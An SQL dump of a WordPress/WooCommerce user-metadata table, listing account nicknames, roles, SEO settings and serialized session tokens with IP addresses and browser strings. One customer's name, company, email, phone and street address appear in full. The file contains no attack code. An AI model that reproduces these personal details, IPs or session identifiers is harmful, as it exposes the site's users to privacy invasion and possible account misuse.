INSERT INTO `wp_usermeta` VALUES (3915, 214, '_yoast_wpseo_profile_updated', '1480607240'); 
INSERT INTO `wp_usermeta` VALUES (3916, 214, 'session_tokens', 'a:1:{s:64:"49967cd6747f771f63fbd64d3853a4e0b990a2ddd263e4bc80f33a796755ca50";a:4:{s:10:"expiration";i:1481816842;s:2:"ip";s:15:"199.116.175.112";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1480607242;}}'); 
INSERT INTO `wp_usermeta` VALUES (3917, 214, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3918, 215, 'nickname', 'grazyna.orzechowska'); 
INSERT INTO `wp_usermeta` VALUES (3919, 215, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3920, 215, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3921, 215, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3922, 215, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3923, 215, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3924, 215, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3925, 215, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3926, 215, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3927, 215, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3928, 215, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3929, 215, '_yoast_wpseo_profile_updated', '1480623883'); 
INSERT INTO `wp_usermeta` VALUES (3930, 215, 'session_tokens', 'a:1:{s:64:"ef4adb4a5c7185f8e1f0109b8cf068a0962b7e3ab804edf5437d799ef4903d58";a:4:{s:10:"expiration";i:1481833485;s:2:"ip";s:12:"74.87.24.203";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1480623885;}}'); 
INSERT INTO `wp_usermeta` VALUES (3931, 215, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3932, 216, 'nickname', 'NRayce'); 
INSERT INTO `wp_usermeta` VALUES (3933, 216, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3934, 216, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3935, 216, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3936, 216, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3937, 216, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3938, 216, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3939, 216, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3940, 216, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3941, 216, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3942, 216, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3943, 216, '_yoast_wpseo_profile_updated', '1480678342'); 
INSERT INTO `wp_usermeta` VALUES (3944, 216, 'session_tokens', 'a:1:{s:64:"700e0758a55d2cea2417a735f1252e55501c3d1c0f0cea237147148c0e06da6d";a:4:{s:10:"expiration";i:1481887943;s:2:"ip";s:15:"204.136.186.157";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1480678343;}}'); 
INSERT INTO `wp_usermeta` VALUES (3945, 216, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3946, 217, 'nickname', 'lyn1.mccormack'); 
INSERT INTO `wp_usermeta` VALUES (3947, 217, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3948, 217, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3949, 217, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3950, 217, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3951, 217, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3952, 217, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3953, 217, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3954, 217, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3955, 217, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3956, 217, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3957, 217, '_yoast_wpseo_profile_updated', '1480683876'); 
INSERT INTO `wp_usermeta` VALUES (3958, 217, 'session_tokens', 'a:1:{s:64:"3fa26c5700f4619cdd4346fdb420629949a9945ef17cad29c7267878563e2f12";a:4:{s:10:"expiration";i:1481890582;s:2:"ip";s:13:"165.225.80.89";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1480680982;}}'); 
INSERT INTO `wp_usermeta` VALUES (3959, 217, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3960, 218, 'nickname', 'roland.wimmer'); 
INSERT INTO `wp_usermeta` VALUES (3961, 218, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3962, 218, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3963, 218, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3964, 218, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3965, 218, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3966, 218, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3967, 218, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3968, 218, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3969, 218, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3970, 218, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3971, 218, '_yoast_wpseo_profile_updated', '1480681563'); 
INSERT INTO `wp_usermeta` VALUES (3972, 218, 'session_tokens', 'a:1:{s:64:"be7362442dd13d4e0793c8194904f104a55ab76a5cbc3395055e5052e59d8774";a:4:{s:10:"expiration";i:1481891164;s:2:"ip";s:14:"62.154.222.196";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1480681564;}}'); 
INSERT INTO `wp_usermeta` VALUES (3973, 218, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3974, 217, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (3975, 217, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (3976, 217, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (3977, 217, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (3978, 217, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (3979, 217, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (3980, 217, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3981, 217, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3982, 217, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (3983, 217, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (3984, 217, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3985, 217, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (3986, 217, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (3987, 217, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (3988, 217, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (3989, 217, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (3990, 217, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (3991, 217, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3992, 217, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3993, 217, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (3994, 217, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (3995, 217, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3996, 217, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (3997, 217, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (3998, 217, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (3999, 217, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (4000, 217, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (4001, 217, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (4002, 217, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (4003, 217, 'last_update', '1480683878'); 
INSERT INTO `wp_usermeta` VALUES (4004, 211, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (4005, 211, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (4006, 211, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (4007, 211, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (4008, 211, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (4009, 211, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (4010, 211, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4011, 211, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4012, 211, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (4013, 211, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (4014, 211, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (4015, 211, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (4016, 211, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (4017, 211, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (4018, 211, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (4019, 211, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (4020, 211, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (4021, 211, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4022, 211, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4023, 211, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (4024, 211, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (4025, 211, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (4026, 211, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (4027, 211, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (4028, 211, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (4029, 211, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (4030, 211, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (4031, 211, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (4032, 211, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (4033, 211, 'last_update', '1480683913'); 
INSERT INTO `wp_usermeta` VALUES (4034, 219, 'nickname', 'chang'); 
INSERT INTO `wp_usermeta` VALUES (4035, 219, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4036, 219, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4037, 219, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4038, 219, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4039, 219, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4040, 219, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4041, 219, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4042, 219, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4043, 219, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4044, 219, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4045, 219, '_yoast_wpseo_profile_updated', '1480685976'); 
INSERT INTO `wp_usermeta` VALUES (4046, 219, 'session_tokens', 'a:1:{s:64:"278462cf54c6c0e714c8f9a8c733c5966317af089bf62366b21e20183a64e99f";a:4:{s:10:"expiration";i:1481895577;s:2:"ip";s:12:"32.217.25.80";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1480685977;}}'); 
INSERT INTO `wp_usermeta` VALUES (4047, 219, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4048, 220, 'nickname', 'rburge'); 
INSERT INTO `wp_usermeta` VALUES (4049, 220, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4050, 220, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4051, 220, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4052, 220, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4053, 220, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4054, 220, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4055, 220, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4056, 220, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4057, 220, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4058, 220, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4059, 220, '_yoast_wpseo_profile_updated', '1480695094'); 
INSERT INTO `wp_usermeta` VALUES (4060, 220, 'session_tokens', 'a:1:{s:64:"3ba2a386099514527778e2d0451cf7ac67482fd7659eb487ff6c60a96edbd68c";a:4:{s:10:"expiration";i:1481904639;s:2:"ip";s:12:"24.166.83.98";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1480695039;}}'); 
INSERT INTO `wp_usermeta` VALUES (4062, 220, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (4063, 220, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (4064, 220, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (4065, 220, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (4066, 220, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (4067, 220, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (4068, 220, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4069, 220, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4070, 220, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (4071, 220, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (4072, 220, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (4073, 220, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (4074, 220, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (4075, 220, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (4076, 220, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (4077, 220, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (4078, 220, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (4079, 220, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4080, 220, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4081, 220, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (4082, 220, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (4083, 220, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (4084, 220, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (4085, 220, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (4086, 220, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (4087, 220, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (4088, 220, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (4089, 220, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (4090, 220, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (4091, 220, 'last_update', '1480695095'); 
INSERT INTO `wp_usermeta` VALUES (4092, 221, 'nickname', 'scottqfm'); 
INSERT INTO `wp_usermeta` VALUES (4093, 221, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4094, 221, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4095, 221, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4096, 221, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4097, 221, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4098, 221, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4099, 221, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4100, 221, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4101, 221, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4102, 221, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4103, 221, '_yoast_wpseo_profile_updated', '1480704946'); 
INSERT INTO `wp_usermeta` VALUES (4104, 221, 'session_tokens', 'a:1:{s:64:"51a2511bbb49ff640fde485da2f4816ba8cbd1dba70e691dfe1efa11c29f8d7b";a:4:{s:10:"expiration";i:1481914547;s:2:"ip";s:12:"209.133.79.7";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1480704947;}}'); 
INSERT INTO `wp_usermeta` VALUES (4105, 222, 'nickname', 'jmiller'); 
INSERT INTO `wp_usermeta` VALUES (4106, 222, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4107, 222, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4108, 222, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4109, 222, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4110, 222, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4111, 222, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4112, 222, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4113, 222, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4114, 222, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4115, 222, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4116, 222, '_yoast_wpseo_profile_updated', '1480953984'); 
INSERT INTO `wp_usermeta` VALUES (4118, 222, 'billing_first_name', 'John'); 
INSERT INTO `wp_usermeta` VALUES (4119, 222, 'billing_last_name', 'Miller'); 
INSERT INTO `wp_usermeta` VALUES (4120, 222, 'billing_company', 'Justice Bearing, LLC'); 
INSERT INTO `wp_usermeta` VALUES (4121, 222, 'billing_email', 'jmiller@justicebearing.com'); 
INSERT INTO `wp_usermeta` VALUES (4122, 222, 'billing_phone', '704-235-0252'); 
INSERT INTO `wp_usermeta` VALUES (4123, 222, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (4124, 222, 'billing_address_1', '243 Overhill Drive, Unit D'); 
INSERT INTO `wp_usermeta` VALUES (4125, 222, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (4126, 222, 'billing_city', 'Mooresville'); 
INSERT INTO `wp_usermeta` VALUES (4127, 222, 'billing_state', 'NC'); 
INSERT INTO `wp_usermeta` VALUES (4128, 222, 'billing_postcode', '28117'); 
INSERT INTO `wp_usermeta` VALUES (4129, 223, 'nickname', 'richard.bitter'); 
INSERT INTO `wp_usermeta` VALUES (4130, 223, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4131, 223, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4132, 223, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4133, 223, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4134, 223, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4135, 223, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4136, 223, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4137, 223, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4138, 223, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4139, 223, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4140, 223, '_yoast_wpseo_profile_updated', '1480960365'); 
INSERT INTO `wp_usermeta` VALUES (4141, 223, 'session_tokens', 'a:1:{s:64:"e3931330d145ac849be227bbf044f80098cc37de10ceab77d9c17d4a4db056f1";a:4:{s:10:"expiration";i:1482169966;s:2:"ip";s:13:"96.245.48.171";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1480960366;}}'); 
INSERT INTO `wp_usermeta` VALUES (4142, 223, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4143, 224, 'nickname', 'udochukwu.agbasonu'); 
INSERT INTO `wp_usermeta` VALUES (4144, 224, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4145, 224, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4146, 224, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4147, 224, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4148, 224, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4149, 224, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4150, 224, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4151, 224, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4152, 224, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4153, 224, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4154, 224, '_yoast_wpseo_profile_updated', '1480964140'); 
INSERT INTO `wp_usermeta` VALUES (4155, 224, 'session_tokens', 'a:2:{s:64:"cbaa930ab56010a51c2a58b3fd88da3e0ad09b117656d7105cf2a11684480e61";a:4:{s:10:"expiration";i:1482170862;s:2:"ip";s:14:"134.132.52.220";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1480961262;}s:64:"552adb2ff2b1574d2f7784d3bf4e891a5cca679d21322d5cac53dd293b98f5d8";a:4:{s:10:"expiration";i:1481139031;s:2:"ip";s:14:"134.132.52.221";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1480966231;}}'); 
INSERT INTO `wp_usermeta` VALUES (4156, 224, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4157, 224, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (4158, 224, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (4159, 224, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (4160, 224, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (4161, 224, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (4162, 224, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (4163, 224, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4164, 224, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4165, 224, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (4166, 224, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (4167, 224, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (4168, 224, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (4169, 224, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (4170, 224, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (4171, 224, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (4172, 224, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (4173, 224, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (4174, 224, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4175, 224, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4176, 224, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (4177, 224, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (4178, 224, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (4179, 224, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (4180, 224, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (4181, 224, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (4182, 224, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (4183, 224, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (4184, 224, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (4185, 224, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (4186, 224, 'last_update', '1480964141'); 
INSERT INTO `wp_usermeta` VALUES (4187, 225, 'nickname', 'marie.ensley'); 
INSERT INTO `wp_usermeta` VALUES (4188, 225, 'first_name', 'Marie'); 
INSERT INTO `wp_usermeta` VALUES (4189, 225, 'last_name', 'Ensley'); 
INSERT INTO `wp_usermeta` VALUES (4190, 225, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4191, 225, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4192, 225, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4193, 225, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4194, 225, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4195, 225, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4196, 225, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4197, 225, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4198, 225, '_yoast_wpseo_profile_updated', '1480969777'); 
INSERT INTO `wp_usermeta` VALUES (4199, 225, 'session_tokens', 'a:1:{s:64:"ae346336c3e59d1b5157d5030c6b907bb56f3caab23008731d2e5365e7939fb6";a:4:{s:10:"expiration";i:1482179378;s:2:"ip";s:15:"104.129.204.109";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1480969778;}}'); 
INSERT INTO `wp_usermeta` VALUES (4200, 225, 'last_update', '1480969869'); 
INSERT INTO `wp_usermeta` VALUES (4201, 226, 'nickname', 'brendaso'); 
INSERT INTO `wp_usermeta` VALUES (4202, 226, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4203, 226, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4204, 226, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4205, 226, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4206, 226, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4207, 226, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4208, 226, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4209, 226, 'show_admin_bar_front', 'true'); 
